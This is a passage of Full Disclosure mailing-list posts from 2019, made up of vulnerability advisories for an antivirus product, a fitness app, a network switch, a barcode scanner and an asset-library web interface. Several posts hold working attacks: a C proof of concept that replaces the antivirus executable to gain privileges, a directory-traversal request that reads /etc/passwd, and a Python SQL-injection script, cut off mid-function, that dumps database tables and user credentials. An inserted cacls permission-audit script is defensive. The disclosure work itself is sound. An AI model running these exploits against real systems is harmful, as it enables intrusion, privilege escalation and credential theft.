[FD] Max Secure Anti Virus Plus - 19.0.4.020 / CVE-2019-19382 Insecure Permissions

2019-11-29 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec


[Vendor]
www.maxpcsecure.com


[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020

File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe


[Vulnerability Type]
Insecure Permissions


[CVE Reference]
CVE-2019-19382


[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the
installation directory.
Local attackers or malware running at low integrity can replace a .exe
or .dll file to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
   BUILTIN\Users:(ID)F
   NT AUTHORITY\SYSTEM:(ID)F
   BUILTIN\Administrators:(ID)F


[Affected Component]
Permissions on installation directory


[Exploit/POC]
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC By hyp3rlinx */

BOOL PWNED=FALSE;

/* TRUE if szPath exists and is a file rather than a directory */
BOOL FileExists(LPCTSTR szPath){
  DWORD dwAttrib = GetFileAttributes(szPath);
  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

void main(void){

  /* First run: the marker file is absent, so copy the original EXE aside */
  if(!FileExists(DISABLED_TARGET)){
    CopyFile(TARGET, TMP, FALSE);
    Sleep(1000);
    CopyFile(TMP, DISABLED_TARGET, FALSE);
    printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
    Sleep(1000);
    printf("[+] Disabled MaxSDUI.exe ...\n");
    Sleep(300);
  }else{
    PWNED=TRUE;
  }

  if(!PWNED){
    char fname[MAX_PATH];
    char newLoc[]=TARGET;
    DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
    if (size){
      printf("[+] Copying exploit to vuln dir...\n");
      Sleep(1000);
      /* The weak directory ACL lets an unprivileged user overwrite the EXE */
      CopyFile(fname, TARGET, FALSE);
      printf("[+] Replaced legit Max Secure EXE...\n");
      Sleep(2000);
      printf("[+] Done!\n");
      MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
      Sleep(1000);
      exit(0);
    }
  }else{
    /* Later run, started from the replaced path: clean up and report */
    if(FileExists(TMP)){
      remove(TMP);
    }
    printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
    printf("[+] hyp3rlinx\n");
    system("pause");
  }
}


[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
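
Added example (not part of the original advisory or the author's PoC): a defender-side audit that parses cacls output in the layout shown under [Security Issue] of the Max Secure advisory and reports files that low-privileged groups can overwrite. The second sample record, the list of low-privileged principals and the function names are constructed for illustration; domain account names containing spaces are not handled.

```python
import re

# Groups that every unprivileged local process belongs to (assumed list).
LOW_PRIV = {"everyone", "builtin\\users",
            "nt authority\\authenticated users", "nt authority\\interactive"}
# cacls rights that allow replacing a file: F(ull), C(hange), W(rite).
WRITE_RIGHTS = set("FCW")
# One ACE at end of line: principal, ':', optional (ID)/(OI)/(CI)/(IO) flags, rights.
ACE_RE = re.compile(
    r"(?<!\S)((?:NT AUTHORITY|BUILTIN)\\[^:\\]+|Everyone|[^\s\\:]+\\[^\s\\:]+)"
    r":((?:\([A-Z]+\))*)([A-Z]+)\s*$")

# First record is the listing from the advisory; the second is constructed.
SAMPLE = r"""C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
   BUILTIN\Users:(ID)F
   NT AUTHORITY\SYSTEM:(ID)F
   BUILTIN\Administrators:(ID)F

C:\Program Files\Example App\app.exe BUILTIN\Users:R
   NT AUTHORITY\SYSTEM:F
   BUILTIN\Administrators:F
"""


def parse_cacls(text):
    """Return {path: [(principal, flags, rights), ...]} from cacls output."""
    acls, current = {}, None
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue
        if not line[0].isspace():      # unindented line starts a new file entry
            current = line[:m.start()].strip()
            acls[current] = []
        if current is not None:
            acls[current].append(m.groups())
    return acls


def writable_by_low_priv(acls):
    """List (path, principal, rights) where a low-privileged group can modify the file."""
    findings = []
    for path, aces in acls.items():
        for principal, flags, rights in aces:
            if "(IO)" in flags:        # inherit-only ACE does not apply to this object
                continue
            if principal.lower() in LOW_PRIV and WRITE_RIGHTS & set(rights):
                findings.append((path, principal, rights))
    return findings
```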


Re: [FD] Anhui Huami Mi Fit Android Application - Unencrypted Update Check

2019-11-29 Thread Tim
What's the issue here exactly? An attacker can just prevent the in-app
update check from realizing it needs to nag the user?

The actual update logic and update-ability is controlled through the Play
Store, no?

-Tim Strazzere


On Tue, Nov 26, 2019 at 10:27 AM David Coomber <
davidcoomber.info...@gmail.com> wrote:

> Anhui Huami Mi Fit Android Application - Unencrypted Update Check
> --
> https://www.info-sec.ca/advisories/Huami-Mi-Fit.html
>
> Overview
>
> "Mi Fit tracks your activity, analyzes sleep, and evaluates your workouts."
>
> (https://play.google.com/store/apps/details?id=com.xiaomi.hm.health)
>
> Issue
>
> The Anhui Huami Mi Fit Android application (version 4.0.10 and below),
> does not encrypt the connection when it checks for an update.
>
> Impact
>
> An attacker who can monitor network traffic may be able to tamper with
> the application's update function.
>
> Timeline
>
> October 21, 2019 - Attempted to obtain a security contact via an email
> to supp...@amazfit.com
> October 22, 2019 - Provided the details to CERT/CC
> October 23, 2019 - CERT/CC opened a case for tracking
> November 4, 2019 - Attempted to obtain a security contact via an email
> to secur...@xiaomi.com
>
> Solution
>
> Upgrade to version 4.0.11 or later



[FD] CVE-2019-18922; Directory Traversal; Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047]

2019-11-29 Thread Sprenger, Nicolas Hendrik

=
CVEID: CVE-2019-18922
NAME OF AFFECTED PRODUCT: Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047]
PROBLEM TYPE: Directory Traversal
DESCRIPTION: A Directory Traversal in the Web interface of the Allied Telesis 
AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047] allows unauthenticated 
attackers to read arbitrary system files via a GET request. 
NOTE: This is an End-of-Life product.

=

I. VULNERABILITY
- -
The Allied Telesis AT-GS950/8 Network Switch with Firmware until AT-S107
V.1.1.3 [1.00.047] is confirmed to have a Directory Traversal Vulnerability.

II. BACKGROUND
- -
The AT-S107 Firmware is used for Configuration through a Web-Interface.

III. DESCRIPTION
- -
A GET-Request with the Path http://[IP]/../../../../../../etc/passwd shows the 
File-Content.

V. BUSINESS IMPACT
- -
An Attacker can read arbitrary System-Files.


VI. SYSTEMS AFFECTED
- -
Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047].

VII. CREDITS
- -
The Vulnerability has been discovered by the Security-Team at the University 
Bayreuth. [N. H. Sprenger, Dr. H. Benda].

VIII. LEGAL NOTICES
- -
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.

=


[FD] [SYSS-2019-027]: Inateck BCST-60 Barcode Scanner - Keystroke Injection Vulnerability (CVE-2019-12503)

2019-11-29 Thread Matthias Deeg
Advisory ID: SYSS-2019-027
Product: BCST-60 Barcode Scanner
Manufacturer: Inateck
Affected Version(s): BCST-60
Tested Version(s): BCST-60
Vulnerability Type: Cryptographic Issues (CWE-310)
Keystroke Injection Vulnerability
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-05-22
Solution Date: -
Public Disclosure: 2019-11-28
CVE Reference: CVE-2019-12503
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Inateck BCST-60 is a barcode scanner that can be either used wirelessly
using 2.4 GHz radio communication or wired via USB.

The manufacturer describes the product as follows [1]:

"With a 2.4G wireless connection, avoid the troubles of Bluetooth
pairing. Inateck BCST-60 is a leading product among scanners in the
field of large transmission ranges and battery endurance. What's more,
it can read barcodes at extreme angles. Whether you need barcode
scanning at your retail POS, at a hospital patient's bedside, on the
manufacturing production line or your warehouse, the Inateck BCST-60
will be a great fit for your specific needs."

Due to an insecure implementation of the data communication, the
wireless barcode scanner Inateck BCST-60 is vulnerable to keystroke
injection attacks.



Vulnerability Details:

SySS GmbH found out that the wireless barcode scanner Inateck BCST-60 is
vulnerable to keystroke injection attacks.

An attacker can analyze the unencrypted and unauthenticated data packets
of the 2.4 GHz radio communication sent by the wireless barcode scanner
to the receiver (USB dongle) in order to learn the used protocol. By
knowing the used data protocol, it is possible to send packets to the
USB dongle (receiver) of a target system, containing attacker-controlled
keystrokes or keystroke sequences.



Proof of Concept (PoC):

SySS GmbH could successfully perform keystroke injection attacks against
the wireless barcode scanner Inateck BCST-60 using a developed
proof-of-concept software tool in combination with the USB radio dongle
Crazyradio PA and the nrf-research-firmware by Marc Newlin [2, 3].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2019-05-22: Vulnerability reported to manufacturer
2019-11-28: Public release of security advisory



References:

[1] Product website for Inateck BCST-60 barcode scanner
https://www.inateck.com/bcst-60-2-4ghz-wireless-barcode-scanner-with-35m-range.html
[2] Product website for Crazyradio PA
https://www.bitcraze.io/crazyradio-pa/
[3] nRF24 research firmware and tools by Marc Newlin
https://github.com/marcnewlin/presentation-clickers
[4] SySS Security Advisory SYSS-2019-027
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-027.txt
[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en





[FD] NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 / Pre-Auth SQL Injection 0Day

2019-11-29 Thread hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt
[+] ISR: ApparitionSec


[Vendor]
www.napc.com


[Product]
Xinet Elegant 6 Asset Library Web Interface v6.1.655

Web based interface for xinet asset management solution.


[Vulnerability Type]
Pre-Auth SQL Injection


[CVE Reference]
CVE-2019-19245


[Security Issue]
NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows
Pre-Authentication Error based SQL Injection via the /elegant6/login
LoginForm[username] field when double quotes are used. The vulnerable
version seems to be old, but it may still be possible to find it
deployed, as I have.

Vulnerable Parameter: LoginForm[username] (POST) Method.


[Exploit/POC]
import requests,time,re,sys,argparse

#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#==
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS: LoginForm[password]=[rememberMe]=0[username]=SQL
#SQL INJECTION VULN PARAM --> LoginForm[username]
#

IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False


def vuln_ver_chk():
    global IP, PORT
    TARGET = "http://"+IP+":"+PORT+"/elegant6/login"
    response = requests.get(TARGET)
    if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content):
        print "[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655."
        return True
    print "[!] Version not vulnerable :("
    return False


def sql_inject_request(SQL):

    global IP, PORT
    URL = "http://"+IP+":"+PORT+"/elegant6/login"

    tmp=""
    headers = {'User-Agent': 'Mozilla/5.0'}
    payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
    session = requests.Session()

    res = session.post(URL,headers=headers,data=payload)
    idx = res.content.find('CDbCommand')  # Start of SQL Injection Error in response
    idx2 = res.content.find('key 1')  # End of SQL Injection Error in response

    return res.content[idx : idx2+3]



#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
    global k,j
    while j < NUM_INJECTS:
        j+=1
        if k !=1:
            k+=1
        return str(j)+','+str(k)


def tidy_up(results):
    global CREDS
    idx = results.find("'")
    if idx != -1:
        idx2 = results.rfind("'")
        if not CREDS:
            return results[idx + 1: idx2 -2]
        else:
            return results[idx + 2: idx2]



def breach(i):
    global k,j,NUM_INJECTS,SHOW_SQL_ERROR
    result=""

    #Dump Usernames & Passwords
    if CREDS:
        if i % 2 == 0:
            target='username'
        else:
            target='password'

        SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))'
             'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -')

        if not SHOW_SQL_ERROR:
            result = tidy_up(sql_inject_request(SQL))
        else:
            result = sql_inject_request(SQL)+"\n"
        print "[+] Dumping "+target+": "+result

    #Dump Tables
    if TABLES:
        while j < NUM_INJECTS:
            nums = inc()
            SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
                 'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')

            if not SHOW_SQL_ERROR:
                result = tidy_up(sql_inject_request(SQL))
            else:
                result = sql_inject_request(SQL) + "\n"

            print "[+] Dumping Table... " +result
            time.sleep(0.3)



def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ip_address", help=".")
    parser.add_argument("-p", "--port", help="Port, Default is 80")
    parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
    parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
    parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.")
    parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.")
    parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.")
    return parser.parse_args()



def usage():
    print "Dump first ten rows of usernames and passwords"
    print "NAPC-Elegant-6-SQL-Exploit.py -i  -c -m 10\n"
    print "\nDump first five rows of database tables and show SQL errors"
    print "NAPC-Elegant-6-SQL-Exploit.py -i  -t -m 5 -s\n"
    exit(0)


def main(args):

    global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR

    if args.ip_address: